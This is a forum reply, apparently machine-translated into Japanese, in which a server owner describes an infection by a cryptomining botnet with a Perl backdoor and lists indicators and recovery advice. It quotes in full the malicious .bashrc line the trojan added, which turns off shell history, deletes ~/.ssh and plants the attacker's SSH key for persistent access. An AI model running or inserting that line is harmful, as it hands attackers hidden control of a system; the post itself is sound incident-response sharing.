私にも同じことが起こり、昨日気づきました。ファイルをチェックする/var/log/syslog
と、このIP(185.234.218.40)がcronjobsを自動的に実行しているように見えました。
http://whatismyipaddress.com(https://whatismyipaddress.com/ip/185.234.218.40)で確認しましたが、いくつかのレポートがあります。これらのファイルはトロイの木馬によって編集されました。
- .bashrc
- .ssh / authorized_keys
私はこれを.bashrc
(bashが開かれるたびに実行されます)の終わりに見つけました:
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
authorized_keys
ファイルを削除します。これは、パスワードなしで接続できるSSHキーのリストです。次に、攻撃者のSSHキーを追加します。
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
さらに、次のフォルダを見つけました:/tmp/.X13-unix/.rsync
すべてのマルウェアがある場所。/tmp/.X13-unix/.rsync/c/ip
70,000個のIPアドレスを含むファイルを見つけましたが、これはおそらく他の被害者またはノードサーバーです。
2つの解決策があります:A:
B:
必要または必要なファイルまたはフォルダーをバックアップします
サーバーをリセットしてUbuntuを再インストールするか、新しいドロップレットを直接作成します
Thom Wiggersが言ったように、あなたは確かにビットコインマイニングボットネットの一部であり、サーバーにはバックドアがあります。バックドアは、perlエクスプロイト、ここにあるファイルを使用します:/tmp/.X13-unix/.rsync/b/run
、これを含む(https://pastebin.com/ceP2jsUy)
私が見つけた最も不審なフォルダーは次のとおりです。
/tmp/.X13-unix/.rsync
~/.bashrc
(編集された)
~/.firefoxcatche
最後に、Perlバックドアに関連する記事があります:https :
//blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
これがあなたのお役に立てば幸いです。
.firefoxcatche
たぶん、Firefoxとは何の関係もありません。これは単なるビットコインのマイナーでしょうか。実行可能ファイルをvirustotalにアップロードしてみてください。